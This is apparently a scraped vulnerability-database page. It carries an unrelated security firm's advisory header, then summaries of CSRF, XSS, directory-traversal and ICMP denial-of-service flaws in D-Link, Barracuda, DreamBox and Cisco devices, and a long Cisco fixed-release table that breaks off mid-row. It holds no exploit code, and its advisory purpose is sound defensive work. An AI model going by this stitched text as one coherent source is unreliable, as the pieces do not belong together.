Australia's premier application penetration testing firm and
trusted IT security advisor to many of the countries largest
organisations.
Sense of Security Pty Ltd
Level 8, 66 King St
Sydney NSW 2000
AUSTRALIA
T: +61 (0)2 9290 4444
F: +61 (0)2 9290 4455
W: http://www.senseofsecurity.com.au
E: info@senseofsecurity.com.au
Twitter: @ITsecurityAU
The latest version of this advisory can be found at:
http://www.senseofsecurity.com.au/advisories/SOS-11-010.pdf
Other Sense of Security advisories can be found at:
http://www.senseofsecurity.com.au/research/it-security-advisories.php
.
Restrict access to trusted users only
| VAR-201210-0554 | CVE-2012-1308 |
D-Link DSL-2640B Firmware redpass.cgi Vulnerable to cross-site request forgery
Related entries in the VARIoT exploits database: VAR-E-201202-0295 |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Cross-site request forgery (CSRF) vulnerability in redpass.cgi in D-Link DSL-2640B Firmware EU_4.00 allows remote attackers to hijack the authentication of administrators for requests that change the administrator password via the sysPassword parameter. D-Link is Taiwan's first publicly traded online company, with its own D-Link brand marketing computer network products in more than 100 countries around the world. Other attacks are also possible. The D-Link DSL-2640B router is prone to a cross-site request-forgery vulnerability.
This issue affects D-Link DSL-2640B. D-Link is a network company founded by Taiwan D-Link Group, dedicated to the R&D, production and marketing of LAN, broadband network, wireless network, voice network and related network equipment
| VAR-201210-0410 | CVE-2012-5316 | Barracuda Spam & Virus Firewall 600 Firmware cross-site scripting vulnerability |
CVSS V2: 3.5 CVSS V3: - Severity: LOW |
Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Spam & Virus Firewall 600 Firmware 4.0.1.009 and earlier allow remote authenticated users to inject arbitrary web script or HTML via (1) Troubleshooting in the Trace route Device module or (2) LDAP Username in the LDAP Configuration module. Barracuda Spam & Virus WAF 600 is prone to multiple unspecified HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. The vulnerability stems from improper filtering of user-supplied input before it is used to dynamically generate content
| VAR-201112-0306 | CVE-2011-4716 | DreamBox DM800 Vulnerable to directory traversal |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in file in DreamBox DM800 1.6rc3, 1.5rc1, and earlier allows remote attackers to read arbitrary files via the file parameter. DreamBox DM800 is prone to a local file-disclosure vulnerability because it fails to adequately validate user-supplied input.
Exploiting this vulnerability would allow an attacker to obtain potentially sensitive information from local files on computers running the vulnerable application. This may aid in further attacks.
DreamBox DM800 versions 1.5rc1 and prior are vulnerable. Dreambox is a Linux-based digital TV set-top box produced by Dream Multimedia in Germany
| VAR-201110-0245 | CVE-2011-3270 | Cisco 10000 Works with series routers Cisco IOS Service disruption in (DoS) Vulnerabilities |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Unspecified vulnerability in Cisco IOS 12.2SB before 12.2(33)SB10 and 15.0S before 15.0(1)S3a on Cisco 10000 series routers allows remote attackers to cause a denial of service (device reload) via a sequence of crafted ICMP packets, aka Bug ID CSCtk62453.
Successful exploits will cause an affected device to reload or hang, denying service to legitimate users.
This issue is being tracked by Cisco Bug ID CSCtk62453.
Cisco has released free software updates that address this
vulnerability.
Workarounds that mitigate this vulnerability are also available.
This advisory is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20110928-c10k.shtml.
Note: The September 28, 2011, Cisco IOS Software Security Advisory
bundled publication includes ten Cisco Security Advisories. Each advisory lists the Cisco IOS Software releases that
correct the vulnerability or vulnerabilities detailed in the advisory as
well as the Cisco IOS Software releases that correct all vulnerabilities
in the September 2011 Bundled Publication.
To determine the Cisco IOS Software release that is running on a Cisco
product, administrators can log in to the device and issue the "show
version" command to display the system banner. The system banner
confirms that the device is running Cisco IOS Software by displaying
text similar to "Cisco Internetwork Operating System Software" or "Cisco
IOS Software." The image name displays in parentheses, followed by
"Version" and the Cisco IOS Software release name. Other Cisco devices
do not have the "show version" command or may provide different output.
The following example identifies a Cisco product that is running
Cisco IOS Software Release 15.0(1)M1 with an installed image name of
C3900-UNIVERSALK9-M:
Router> show version
Cisco IOS Software, C3900 Software (C3900-UNIVERSALK9-M), Version 15.0(1)M1, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2009 by Cisco Systems, Inc.
Compiled Wed 02-Dec-09 17:17 by prod_rel_team
!--- output truncated
Additional information about Cisco IOS Software release naming
conventions is available in the white paper Cisco IOS and NX-OS
Software Reference Guide available at:
http://www.cisco.com/web/about/security/intelligence/ios-ref.html.
Products Confirmed Not Vulnerable
+--------------------------------
Cisco IOS XR Software is not affected by this vulnerability.
Cisco IOS XE Software is not affected by this vulnerability.
No other Cisco products are currently known to be affected by this
vulnerability.
Traffic destined to the device or transit traffic could trigger the
effects of this vulnerability.
Vulnerability Scoring Details
=============================
Cisco has provided scores for the vulnerability in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* CSCtk62453 ("Certain ICMP packets may cause device to reload")
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of this vulnerability could cause an affected
device to reload. Repeated exploitation could result in a sustained
DoS condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Additionally, the Cisco IOS Software Checker is available on
the Cisco Security Intelligence Operations (SIO) portal at
http://tools.cisco.com/security/center/selectIOSVersion.x. It provides
several features for checking which Security Advisories affect specified
versions of Cisco IOS Software.
Cisco IOS Software
+-----------------
Each row of the following Cisco IOS Software table corresponds to a
Cisco IOS Software train. If a particular train is vulnerable, the
earliest releases that contain the fix are listed in the First Fixed
Release For This Advisory column. The First Fixed Release for All
Advisories in the September 2011 Bundled Publication column lists the
earliest possible releases that correct all the published
vulnerabilities in the Cisco IOS Software Security Advisory bundled
publication. Cisco recommends upgrading to the latest available
release, where possible.
+------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|------------+-----------------------------------------------|
| Affected | | First Fixed Release for |
| 12.0-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------------------------------------------------------|
| There are no affected 12.0 based releases |
|------------------------------------------------------------|
| Affected | | First Fixed Release for |
| 12.1-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------------------------------------------------------|
| There are no affected 12.1 based releases |
|------------------------------------------------------------|
| Affected | | First Fixed Release for |
| 12.2-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------+------------------+----------------------------|
| 12.2 | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2B | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2BC | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2BW | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2BX | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SB |
|------------+------------------+----------------------------|
| 12.2BY | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2BZ | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2CX | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2CY | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2CZ | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SB |
|------------+------------------+----------------------------|
| 12.2DA | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2DD | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2DX | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2EU | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Releases up to and |
| 12.2EW | Not vulnerable | including 12.2(20)EW4 are |
| | | not vulnerable. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2EWA | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2EX | Not vulnerable | 12.2(55)EX3 |
|------------+------------------+----------------------------|
| 12.2EY | Not vulnerable | 12.2(58)EY |
|------------+------------------+----------------------------|
| 12.2EZ | Not vulnerable | Vulnerable; migrate to any |
| | | release in 15.0SE |
|------------+------------------+----------------------------|
| 12.2FX | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2FY | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2EX |
|------------+------------------+----------------------------|
| 12.2FZ | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2IRA | Not vulnerable | Vulnerable; migrate to any |
| | | release in 12.2IRG |
|------------+------------------+----------------------------|
| 12.2IRB | Not vulnerable | Vulnerable; migrate to any |
| | | release in 12.2IRG |
|------------+------------------+----------------------------|
| 12.2IRC | Not vulnerable | Vulnerable; migrate to any |
| | | release in 12.2IRG |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IRD | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IRE | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2IRF | Not vulnerable | Vulnerable; migrate to any |
| | | release in 12.2IRG |
|------------+------------------+----------------------------|
| 12.2IRG | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXA | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXB | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXC | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXD | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXE | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXF | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXG | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2IXH | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2JA | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2JK | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2MB | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2MC | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2MRA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SRD |
|------------+------------------+----------------------------|
| 12.2MRB | Not vulnerable | 12.2(33)MRB5 |
|------------+------------------+----------------------------|
| | | 12.2(30)S are vulnerable; |
| | | Releases12.2(30)S and |
| 12.2S | Not vulnerable | later are not vulnerable. |
| | | First fixed in Release |
| | | 12.2SB |
|------------+------------------+----------------------------|
| | Releases prior | |
| | to 12.2(31)SB18 | |
| | and 12.2(33)SB9 | 12.2(31)SB20 |
| 12.2SB | are not | |
| | vulnerable. | 12.2(33)SB10 |
| | | |
| | 12.2(33)SB10 | |
|------------+------------------+----------------------------|
| 12.2SBC | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SB |
|------------+------------------+----------------------------|
| 12.2SCA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SCC |
|------------+------------------+----------------------------|
| 12.2SCB | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SCC |
|------------+------------------+----------------------------|
| 12.2SCC | Not vulnerable | 12.2(33)SCC7 |
|------------+------------------+----------------------------|
| 12.2SCD | Not vulnerable | 12.2(33)SCD6 |
|------------+------------------+----------------------------|
| | | 12.2(33)SCE1 |
| 12.2SCE | Not vulnerable | |
| | | 12.2(33)SCE2 |
|------------+------------------+----------------------------|
| 12.2SCF | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | 12.2(55)SE3 |
| 12.2SE | Not vulnerable | |
| | | 12.2(58)SE |
|------------+------------------+----------------------------|
| 12.2SEA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2SEB | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2SEC | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2SED | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2SEE | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| 12.2SEF | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SE |
|------------+------------------+----------------------------|
| | | Releases prior to 12.2(25) |
| | | SEG4 are vulnerable; |
| 12.2SEG | Not vulnerable | Releases12.2(25)SEG4 and |
| | | later are not vulnerable. |
| | | First fixed in Release |
| | | 12.2EX |
|------------+------------------+----------------------------|
| | | Releases prior to 12.2(53) |
| 12.2SG | Not vulnerable | SG4 are vulnerable; |
| | | Releases 12.2(53)SG4 and |
| | | later are not vulnerable. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2SGA | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2SL | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2SM | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2SO | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2SQ | Not vulnerable | 12.2(50)SQ3 |
|------------+------------------+----------------------------|
| 12.2SRA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SRD |
|------------+------------------+----------------------------|
| 12.2SRB | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SRD |
|------------+------------------+----------------------------|
| 12.2SRC | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SRD |
|------------+------------------+----------------------------|
| 12.2SRD | Not vulnerable | 12.2(33)SRD6 |
|------------+------------------+----------------------------|
| 12.2SRE | Not vulnerable | 12.2(33)SRE4 |
|------------+------------------+----------------------------|
| 12.2STE | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2SU | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| | | Releases prior to 12.2 |
| | | (29a)SV are vulnerable; |
| 12.2SV | Not vulnerable | Releases 12.2(29a)SV and |
| | | later are not vulnerable. |
| | | Migrate to any release in |
| | | 12.2SVD |
|------------+------------------+----------------------------|
| 12.2SVA | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2SVC | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2SVD | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2SVE | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2SW | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2SX | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXF |
|------------+------------------+----------------------------|
| 12.2SXA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXF |
|------------+------------------+----------------------------|
| 12.2SXB | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXF |
|------------+------------------+----------------------------|
| 12.2SXD | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXF |
|------------+------------------+----------------------------|
| 12.2SXE | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXF |
|------------+------------------+----------------------------|
| 12.2SXF | Not vulnerable | 12.2(18)SXF17b |
|------------+------------------+----------------------------|
| 12.2SXH | Not vulnerable | 12.2(33)SXH8a |
|------------+------------------+----------------------------|
| 12.2SXI | Not vulnerable | 12.2(33)SXI6 |
|------------+------------------+----------------------------|
| 12.2SXJ | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2SY | Not vulnerable | 12.2(50)SY |
|------------+------------------+----------------------------|
| 12.2SZ | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SB |
|------------+------------------+----------------------------|
| 12.2T | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2TPC | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2XA | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XB | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2XC | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XD | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XE | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XF | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XG | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XH | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XI | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XJ | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XK | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XL | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XM | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XN | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | Please see Cisco | Please see Cisco IOS-XE |
| 12.2XNA | IOS-XE Software | Software Availability |
| | Availability | |
|------------+------------------+----------------------------|
| | Please see Cisco | Please see Cisco IOS-XE |
| 12.2XNB | IOS-XE Software | Software Availability |
| | Availability | |
|------------+------------------+----------------------------|
| | Please see Cisco | Please see Cisco IOS-XE |
| 12.2XNC | IOS-XE Software | Software Availability |
| | Availability | |
|------------+------------------+----------------------------|
| | Please see Cisco | Please see Cisco IOS-XE |
| 12.2XND | IOS-XE Software | Software Availability |
| | Availability | |
|------------+------------------+----------------------------|
| | Please see Cisco | Please see Cisco IOS-XE |
| 12.2XNE | IOS-XE Software | Software Availability |
| | Availability | |
|------------+------------------+----------------------------|
| | Please see Cisco | Please see Cisco IOS-XE |
| 12.2XNF | IOS-XE Software | Software Availability |
| | Availability | |
|------------+------------------+----------------------------|
| | | Releases prior to 12.2(54) |
| 12.2XO | Not vulnerable | XO are vulnerable; |
| | | Releases12.2(54)XO and |
| | | later are not vulnerable. |
|------------+------------------+----------------------------|
| 12.2XQ | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XR | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XS | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XT | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XU | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XV | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2XW | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2YA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2YB | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2YC | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2YD | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2YE | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YF | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YG | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YH | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YJ | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2YK | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YL | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2YM | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YN | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2YO | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2YP | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YQ | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YR | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YS | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YT | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YU | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YV | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YW | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YX | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YY | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2YZ | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2ZA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXF |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2ZB | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2ZC | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2ZD | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2ZE | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2ZF | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2ZG | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2ZH | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.4 |
|------------+------------------+----------------------------|
| 12.2ZJ | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2ZL | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 12.2ZP | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 12.2ZU | Not vulnerable | Vulnerable; First fixed in |
| | | Release 12.2SXH |
|------------+------------------+----------------------------|
| 12.2ZX | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2ZY | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 12.2ZYA | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| Affected | | First Fixed Release for |
| 12.3-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------------------------------------------------------|
| There are no affected 12.3 based releases |
|------------------------------------------------------------|
| Affected | | First Fixed Release for |
| 12.4-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------------------------------------------------------|
| There are no affected 12.4 based releases |
|------------------------------------------------------------|
| Affected | First Fixed | |
| 15.0-Based | Release | Bundle First Fixed Release |
| Releases | | |
|------------+------------------+----------------------------|
| 15.0M | Not vulnerable | 15.0(1)M7 |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 15.0MR | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 15.0MRA | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 15.0S | 15.0(1)S3a | 15.0(1)S4 |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 15.0SA | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 15.0SE | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 15.0SG | Not vulnerable | Not vulnerable |
|------------+------------------+----------------------------|
| 15.0XA | Not vulnerable | Vulnerable; First fixed in |
| | | Release 15.1T |
|------------+------------------+----------------------------|
| | | Releases prior to 15.0(2) |
| 15.0XO | Not vulnerable | XO1 are vulnerable; |
| | | Releases15.0(2)XO1 and |
| | | later are not vulnerable. |
|------------+------------------+----------------------------|
| Affected | | First Fixed Release for |
| 15.1-Based | First Fixed | All Advisories in the |
| Releases | Release | September 2011 Bundled |
| | | Publication |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 15.1EY | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| 15.1GC | Not vulnerable | Vulnerable; First fixed in |
| | | Release 15.1T |
|------------+------------------+----------------------------|
| 15.1M | Not vulnerable | 15.1(4)M2; Available on |
| | | 30-SEP-11 |
|------------+------------------+----------------------------|
| | | Vulnerable; contact your |
| | | support organization per |
| 15.1MR | Not vulnerable | the instructions in the |
| | | Obtaining Fixed Software |
| | | section of this advisory. |
|------------+------------------+----------------------------|
| | | 15.1(2)S2 |
| 15.1S | Not vulnerable | |
| | | 15.1(3)S |
|------------+------------------+----------------------------|
| | | 15.1(2)T4 |
| 15.1T | Not vulnerable | |
| | | 15.1(1)T4 on 8-Dec-2011 |
